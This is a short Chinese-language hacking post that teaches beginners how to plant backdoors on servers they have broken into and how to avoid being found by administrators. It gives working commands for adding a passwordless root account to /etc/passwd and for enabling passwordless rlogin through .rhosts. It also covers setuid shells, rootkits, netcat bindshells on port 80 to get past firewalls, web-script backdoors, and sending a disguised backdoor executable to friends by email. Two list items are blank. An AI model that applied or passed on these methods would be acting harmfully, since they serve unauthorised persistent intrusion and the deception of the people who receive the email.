對于我們這樣的菜手,好不容易搞了臺服務器很不容易,如果被發現了就慘了。其實,開后門的方法有很多種,下面我來說說,我以前學習過的幾種方法。
1. Setuid
|
加上 suid 位到shell 上,雖然很簡單,但容易被發現。
2. Echo "hack::0:0::/:/bin/csh" >> /etc/passwd
即給系統增加一個 ID 為 0(root)的帳號,無口令,但管理員用find命令就可以發現。
3.Echo "+ hack">>/.rhosts
如果這個系統開了512、513的port,就可以。把一個名為hack加到.rhosts文件中,rlogin登陸,無須密碼。
4.修改 Sendmail.cf文件
增加一個"wiz" 命令,然后telnet www.xxx.com 25后,wiz,這就可以了。
5. Rootkit backdoor
這些東西現在是很火熱的東西,但小心該后的文件的適用性、日期等等一些小的細節。有的需要自己編譯,有的是編譯好的。
6.Remote shell
Sunx的那個backdoor就很不錯,不會產生日記文件,防止who等等。需要編譯,但運行在redhat 6.1很不錯。但在7.1等版本中好象就有點bug。
或者可以bindshell,可以替換inetd.conf中不常用的服務,注意文件的修改時間。
7. Http后門
其實,一般的防火墻對Web服務的限制少的很,所以我們可以從這里入手,這里需要用到端口重定向。簡單的說就是web開的http服務有2個,一個是http本身,一個是remote shell bindshell。防火墻過濾其他一切port,禁止反向連接,簡單的就是可以用nc。(netcat這個)把cmd.exe綁定到80端口上去。telnet www.xxx.com 80 然后就得到一個shell?;蛘呖梢岳胊sp,php.cgi等代碼寫的后門,也可以作到相同的效果。
8.Bat后門(原創)
如果是xnix服務器,沒辦法。
Ms服務器:
|
如果狠點的話,干脆再給它上個rootkit for win。
9.可以利用郵件編碼漏洞
自己設置一個base64的編碼文件發給你的朋友,然后把后門.exe轉換成郵件編碼。
其實,上面的方法都是很常見的方法。還有很多方法,一時沒辦法整理出來,但對于新手來說足夠了!


